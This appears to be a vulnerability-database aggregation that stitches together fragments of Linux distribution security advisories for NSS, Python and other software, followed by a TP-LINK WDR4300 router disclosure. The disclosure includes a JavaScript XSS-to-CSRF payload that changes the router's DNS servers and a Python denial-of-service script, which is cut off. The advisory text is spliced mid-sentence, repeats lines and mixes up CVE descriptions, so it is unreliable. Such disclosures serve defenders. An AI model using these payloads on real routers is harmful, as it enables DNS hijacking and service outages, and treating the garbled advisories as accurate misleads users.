https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.1_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.2_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.3_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.1_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.2_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.4_release_notes https://www.mozilla.org/en-US/security/advisories/mfsa2014-55/ _______________________________________________________________________ Updated Packages: Mandriva Business Server 2/X86_64: 2aea53da7622f23ec03faa5605d9672c mbs2/x86_64/lemon-3.8.6-1.mbs2.x86_64.rpm 68cc94d4a95146583d8a6b2849759614 mbs2/x86_64/lib64nspr4-4.10.8-1.mbs2.x86_64.rpm a6ffe2ebe6de847b6227c8c4c2cb4ba4 mbs2/x86_64/lib64nspr-devel-4.10.8-1.mbs2.x86_64.rpm 78ba63e6a21b897abac8e4b0e975470d mbs2/x86_64/lib64nss3-3.17.4-1.mbs2.x86_64.rpm aacf8b1f144a7044e77abc5d0be72a7b mbs2/x86_64/lib64nss-devel-3.17.4-1.mbs2.x86_64.rpm 6afff220f7fa93dede0486b76155ae44 mbs2/x86_64/lib64nss-static-devel-3.17.4-1.mbs2.x86_64.rpm 63ffb7675dc414a52a4647f5ed302e3c mbs2/x86_64/lib64sqlite3_0-3.8.6-1.mbs2.x86_64.rpm cfefad1ef4f83cceeeb34a4f2ffca442 mbs2/x86_64/lib64sqlite3-devel-3.8.6-1.mbs2.x86_64.rpm e976251ee0ae5c2b2a2f6a163b693e85 mbs2/x86_64/lib64sqlite3-static-devel-3.8.6-1.mbs2.x86_64.rpm 42018611a17d2b6480b63f0a968a796d mbs2/x86_64/nss-3.17.4-1.mbs2.x86_64.rpm b955454c30e482635944134eb02456e4 mbs2/x86_64/nss-doc-3.17.4-1.mbs2.noarch.rpm 3058267964146b7806c493ff536da63d mbs2/x86_64/rootcerts-20141117.00-1.mbs2.x86_64.rpm 18fc28f1ae18ddd5fe01acb77811d0e6 mbs2/x86_64/rootcerts-java-20141117.00-1.mbs2.x86_64.rpm 200f6a413d13d850ea084a9e42c4fc23 mbs2/x86_64/sqlite3-tcl-3.8.6-1.mbs2.x86_64.rpm 8c88a446098d21cf2675173e32a208e6 mbs2/x86_64/sqlite3-tools-3.8.6-1.mbs2.x86_64.rpm 2e494a940c3189617ff62bc15a2b14fb mbs2/SRPMS/nspr-4.10.8-1.mbs2.src.rpm 0a28d1c9c07909d488c7dabe92c47529 mbs2/SRPMS/nss-3.17.4-1.mbs2.src.rpm 10dcc357bb0bbdc22e7dd308074d037b mbs2/SRPMS/rootcerts-20141117.00-1.mbs2.src.rpm df412cc892bb40e1d7345079a25c0bbb mbs2/SRPMS/sqlite3-3.8.6-1.mbs2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFVAvuLmqjQ0CJFipgRArOfAKDn7F7m/ZnJATspmFD0k083yGXQJwCdHAzw P1QqaGn3HFIH8gKR7XVcRAA= =ZF+9 -----END PGP SIGNATURE----- . For the stable distribution (wheezy), this problem has been fixed in version 24.8.1esr-1~deb7u1. For the testing distribution (jessie) and unstable distribution (sid), Iceweasel uses the system NSS library, handled in DSA 3033-1. We recommend that you upgrade your iceweasel packages

Knot DNS before 1.5.2 allows remote attackers to cause a denial of service (application crash) via a crafted DNS message. Knot DNS Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Knot DNS is a DNS server. Knot DNS is prone to an unspecified denial-of-service vulnerability. Remote attackers can exploit this issue to cause denial-of-service conditions for legitimate users

Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function. Python is prone to an integer-overflow vulnerability because it fails to properly bounds check user-supplied input before copying it into an insufficiently sized buffer. Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition. Versions prior to Python 2.7.8 are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/python < 3.3.5-r1 *>= 2.7.9-r1 >= 3.3.5-r1 Description =========== Multiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Python 3.3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1" All Python 2.7 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1" References ========== [ 1 ] CVE-2013-1752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752 [ 2 ] CVE-2013-7338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338 [ 3 ] CVE-2014-1912 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912 [ 4 ] CVE-2014-2667 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667 [ 5 ] CVE-2014-4616 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616 [ 6 ] CVE-2014-7185 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185 [ 7 ] CVE-2014-9365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201503-10 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. ============================================================================ Ubuntu Security Notice USN-2653-1 June 25, 2015 python2.7, python3.2, python3.4 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.10 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Several security issues were fixed in Python. A malicious ftp, http, imap, nntp, pop or smtp server could use this issue to cause a denial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.10: python2.7 2.7.8-10ubuntu1.1 python2.7-minimal 2.7.8-10ubuntu1.1 python3.4 3.4.2-1ubuntu0.1 python3.4-minimal 3.4.2-1ubuntu0.1 Ubuntu 14.04 LTS: python2.7 2.7.6-8ubuntu0.2 python2.7-minimal 2.7.6-8ubuntu0.2 python3.4 3.4.0-2ubuntu1.1 python3.4-minimal 3.4.0-2ubuntu1.1 Ubuntu 12.04 LTS: python2.7 2.7.3-0ubuntu3.8 python2.7-minimal 2.7.3-0ubuntu3.8 python3.2 3.2.3-0ubuntu3.7 python3.2-minimal 3.2.3-0ubuntu3.7 In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: python27 security, bug fix, and enhancement update Advisory ID: RHSA-2015:1064-01 Product: Red Hat Software Collections Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1064.html Issue date: 2015-06-04 CVE Names: CVE-2013-1752 CVE-2013-1753 CVE-2014-1912 CVE-2014-4616 CVE-2014-4650 CVE-2014-7185 ===================================================================== 1. Summary: Updated python27 collection packages that fix multiple security issues and several bugs are now available as part of Red Hat Software Collections 2. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 3. Description: Python is an interpreted, interactive, object-oriented programming language that supports modules, classes, exceptions, high-level dynamic data types, and dynamic typing. The python27 collection provide a stable release of Python 2.7 with a number of additional utilities and database connectors for MySQL and PostgreSQL. The python27-python packages have been upgraded to upstream version 2.7.8, which provides numerous bug fixes over the previous version. (BZ#1167912) The following security issues were fixed in the python27-python component: It was discovered that the socket.recvfrom_into() function failed to check the size of the supplied buffer. This could lead to a buffer overflow when the function was called with an insufficiently sized buffer. (CVE-2014-1912) It was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753) It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752) It was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185) The following security issue was fixed in the python27-python and python27-python-simplejson components: A flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616) In addition, this update adds the following enhancement: * The python27 Software Collection now includes the python-wheel and python-pip modules. (BZ#994189, BZ#1167902) All python27 users are advised to upgrade to these updated packages, which correct these issues and add these enhancements. All running python27 instances must be restarted for this update to take effect. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 994189 - Please create a python-pip build for the python 2.7 and 3.3 SCL environments on RHEL 6 1046170 - CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip enconding 1046174 - CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib 1062370 - CVE-2014-1912 python: buffer overflow in socket.recvfrom_into() 1112285 - CVE-2014-4616 python: missing boundary check in JSON module 1113527 - CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs 1146026 - CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read 1167912 - Update Python in python27 SCL to Python 2.7.8 1170993 - RPM macro rpm/macros.python2.python27 references non-existing /usr/lib/rpm/brp-scl-compress 6. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6): Source: python27-1.1-17.el6.src.rpm python27-python-2.7.8-3.el6.src.rpm python27-python-pip-1.5.6-5.el6.src.rpm python27-python-setuptools-0.9.8-3.el6.src.rpm python27-python-simplejson-3.2.0-2.el6.src.rpm python27-python-wheel-0.24.0-2.el6.src.rpm noarch: python27-python-pip-1.5.6-5.el6.noarch.rpm python27-python-setuptools-0.9.8-3.el6.noarch.rpm python27-python-wheel-0.24.0-2.el6.noarch.rpm x86_64: python27-1.1-17.el6.x86_64.rpm python27-python-2.7.8-3.el6.x86_64.rpm python27-python-debug-2.7.8-3.el6.x86_64.rpm python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm python27-python-devel-2.7.8-3.el6.x86_64.rpm python27-python-libs-2.7.8-3.el6.x86_64.rpm python27-python-simplejson-3.2.0-2.el6.x86_64.rpm python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm python27-python-test-2.7.8-3.el6.x86_64.rpm python27-python-tools-2.7.8-3.el6.x86_64.rpm python27-runtime-1.1-17.el6.x86_64.rpm python27-scldevel-1.1-17.el6.x86_64.rpm python27-tkinter-2.7.8-3.el6.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5): Source: python27-1.1-17.el6.src.rpm python27-python-2.7.8-3.el6.src.rpm python27-python-pip-1.5.6-5.el6.src.rpm python27-python-setuptools-0.9.8-3.el6.src.rpm python27-python-simplejson-3.2.0-2.el6.src.rpm python27-python-wheel-0.24.0-2.el6.src.rpm noarch: python27-python-pip-1.5.6-5.el6.noarch.rpm python27-python-setuptools-0.9.8-3.el6.noarch.rpm python27-python-wheel-0.24.0-2.el6.noarch.rpm x86_64: python27-1.1-17.el6.x86_64.rpm python27-python-2.7.8-3.el6.x86_64.rpm python27-python-debug-2.7.8-3.el6.x86_64.rpm python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm python27-python-devel-2.7.8-3.el6.x86_64.rpm python27-python-libs-2.7.8-3.el6.x86_64.rpm python27-python-simplejson-3.2.0-2.el6.x86_64.rpm python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm python27-python-test-2.7.8-3.el6.x86_64.rpm python27-python-tools-2.7.8-3.el6.x86_64.rpm python27-runtime-1.1-17.el6.x86_64.rpm python27-scldevel-1.1-17.el6.x86_64.rpm python27-tkinter-2.7.8-3.el6.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6): Source: python27-1.1-17.el6.src.rpm python27-python-2.7.8-3.el6.src.rpm python27-python-pip-1.5.6-5.el6.src.rpm python27-python-setuptools-0.9.8-3.el6.src.rpm python27-python-simplejson-3.2.0-2.el6.src.rpm python27-python-wheel-0.24.0-2.el6.src.rpm noarch: python27-python-pip-1.5.6-5.el6.noarch.rpm python27-python-setuptools-0.9.8-3.el6.noarch.rpm python27-python-wheel-0.24.0-2.el6.noarch.rpm x86_64: python27-1.1-17.el6.x86_64.rpm python27-python-2.7.8-3.el6.x86_64.rpm python27-python-debug-2.7.8-3.el6.x86_64.rpm python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm python27-python-devel-2.7.8-3.el6.x86_64.rpm python27-python-libs-2.7.8-3.el6.x86_64.rpm python27-python-simplejson-3.2.0-2.el6.x86_64.rpm python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm python27-python-test-2.7.8-3.el6.x86_64.rpm python27-python-tools-2.7.8-3.el6.x86_64.rpm python27-runtime-1.1-17.el6.x86_64.rpm python27-scldevel-1.1-17.el6.x86_64.rpm python27-tkinter-2.7.8-3.el6.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6): Source: python27-1.1-17.el6.src.rpm python27-python-2.7.8-3.el6.src.rpm python27-python-pip-1.5.6-5.el6.src.rpm python27-python-setuptools-0.9.8-3.el6.src.rpm python27-python-simplejson-3.2.0-2.el6.src.rpm python27-python-wheel-0.24.0-2.el6.src.rpm noarch: python27-python-pip-1.5.6-5.el6.noarch.rpm python27-python-setuptools-0.9.8-3.el6.noarch.rpm python27-python-wheel-0.24.0-2.el6.noarch.rpm x86_64: python27-1.1-17.el6.x86_64.rpm python27-python-2.7.8-3.el6.x86_64.rpm python27-python-debug-2.7.8-3.el6.x86_64.rpm python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm python27-python-devel-2.7.8-3.el6.x86_64.rpm python27-python-libs-2.7.8-3.el6.x86_64.rpm python27-python-simplejson-3.2.0-2.el6.x86_64.rpm python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm python27-python-test-2.7.8-3.el6.x86_64.rpm python27-python-tools-2.7.8-3.el6.x86_64.rpm python27-runtime-1.1-17.el6.x86_64.rpm python27-scldevel-1.1-17.el6.x86_64.rpm python27-tkinter-2.7.8-3.el6.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: python27-1.1-20.el7.src.rpm python27-python-2.7.8-3.el7.src.rpm python27-python-pip-1.5.6-5.el7.src.rpm python27-python-setuptools-0.9.8-5.el7.src.rpm python27-python-simplejson-3.2.0-3.el7.src.rpm python27-python-wheel-0.24.0-2.el7.src.rpm noarch: python27-python-pip-1.5.6-5.el7.noarch.rpm python27-python-setuptools-0.9.8-5.el7.noarch.rpm python27-python-wheel-0.24.0-2.el7.noarch.rpm x86_64: python27-1.1-20.el7.x86_64.rpm python27-python-2.7.8-3.el7.x86_64.rpm python27-python-debug-2.7.8-3.el7.x86_64.rpm python27-python-debuginfo-2.7.8-3.el7.x86_64.rpm python27-python-devel-2.7.8-3.el7.x86_64.rpm python27-python-libs-2.7.8-3.el7.x86_64.rpm python27-python-simplejson-3.2.0-3.el7.x86_64.rpm python27-python-simplejson-debuginfo-3.2.0-3.el7.x86_64.rpm python27-python-test-2.7.8-3.el7.x86_64.rpm python27-python-tools-2.7.8-3.el7.x86_64.rpm python27-runtime-1.1-20.el7.x86_64.rpm python27-scldevel-1.1-20.el7.x86_64.rpm python27-tkinter-2.7.8-3.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: python27-1.1-20.el7.src.rpm python27-python-2.7.8-3.el7.src.rpm python27-python-pip-1.5.6-5.el7.src.rpm python27-python-setuptools-0.9.8-5.el7.src.rpm python27-python-simplejson-3.2.0-3.el7.src.rpm python27-python-wheel-0.24.0-2.el7.src.rpm noarch: python27-python-pip-1.5.6-5.el7.noarch.rpm python27-python-setuptools-0.9.8-5.el7.noarch.rpm python27-python-wheel-0.24.0-2.el7.noarch.rpm x86_64: python27-1.1-20.el7.x86_64.rpm python27-python-2.7.8-3.el7.x86_64.rpm python27-python-debug-2.7.8-3.el7.x86_64.rpm python27-python-debuginfo-2.7.8-3.el7.x86_64.rpm python27-python-devel-2.7.8-3.el7.x86_64.rpm python27-python-libs-2.7.8-3.el7.x86_64.rpm python27-python-simplejson-3.2.0-3.el7.x86_64.rpm python27-python-simplejson-debuginfo-3.2.0-3.el7.x86_64.rpm python27-python-test-2.7.8-3.el7.x86_64.rpm python27-python-tools-2.7.8-3.el7.x86_64.rpm python27-runtime-1.1-20.el7.x86_64.rpm python27-scldevel-1.1-20.el7.x86_64.rpm python27-tkinter-2.7.8-3.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2013-1752 https://access.redhat.com/security/cve/CVE-2013-1753 https://access.redhat.com/security/cve/CVE-2014-1912 https://access.redhat.com/security/cve/CVE-2014-4616 https://access.redhat.com/security/cve/CVE-2014-4650 https://access.redhat.com/security/cve/CVE-2014-7185 https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFVcBZ/XlSAg2UNWIIRAojaAKC/1aPfLPbhJulkzyGMdfoFYq3itwCgns9a lOwtT2ZeE8hH6JpnObD51MU= =ulrW -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64 3. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Space precludes documenting all of these changes in this advisory. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912). This updates the python package to version 2.7.6, which fixes several other bugs, including denial of service flaws due to unbound readline() calls in the ftplib and nntplib modules (CVE-2013-1752). Denial of service flaws due to unbound readline() calls in the imaplib, poplib, and smtplib modules (CVE-2013-1752). A gzip bomb and unbound read denial of service flaw in python XMLRPC library (CVE-2013-1753). Python are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). The CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. Python before 2.7.8 is vulnerable to an integer overflow in the buffer type (CVE-2014-7185). When Python&#039;s standard library HTTP clients (httplib, urllib, urllib2, xmlrpclib) are used to access resources with HTTPS, by default the certificate is not checked against any trust store, nor is the hostname in the certificate checked against the requested host. It was possible to configure a trust root to be checked against, however there were no faculties for hostname checking (CVE-2014-9365). The python-pip and tix packages was added due to missing build dependencies. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFVFY0qmqjQ0CJFipgRAnTSAKDqsSqyFLO4F/4mq6ZmL7fZ+yYhjgCeNkAn fc0CS3IgYNQdHz4EMRvQ9Tg= =giLB -----END PGP SIGNATURE-----

Cisco Unified Communications Domain Manager Platform Software 4.4(.3) and earlier allows remote attackers to cause a denial of service (CPU consumption) by sending crafted TCP packets quickly, aka Bug ID CSCuo42063. A remote attacker may exploit this issue to trigger denial-of-service condition due to excessive CPU utilization. This issue is being tracked by Cisco Bug ID CSCuo42063. This component features scalable, distributed, and highly available enterprise Voice over IP call processing

The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial of service vulnerability that allows an attacker to exploit a vulnerability to initiate a denial of service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Versions Affected: 130617 , possibly earlier CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728 Vulnerabilities Description =================== # Stored XSS - It is possible inject javascript code via DHCP hostname field, If the administrator will visit the dhcp clients page (web panel) the script will execute. Proof of Concept: ============ http://elisyan.com/tplink/wdr4300.html ---- start wdr4300.html ---- /* Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) */ var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send(); ---- end wdr4300.html ---- http://elisyan.com/tplink/wdr4300.py ---- start wdr4300.py ---- #Author: Oz Elisyan #TP-Link WDR4300 DoS PoC import httplib conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA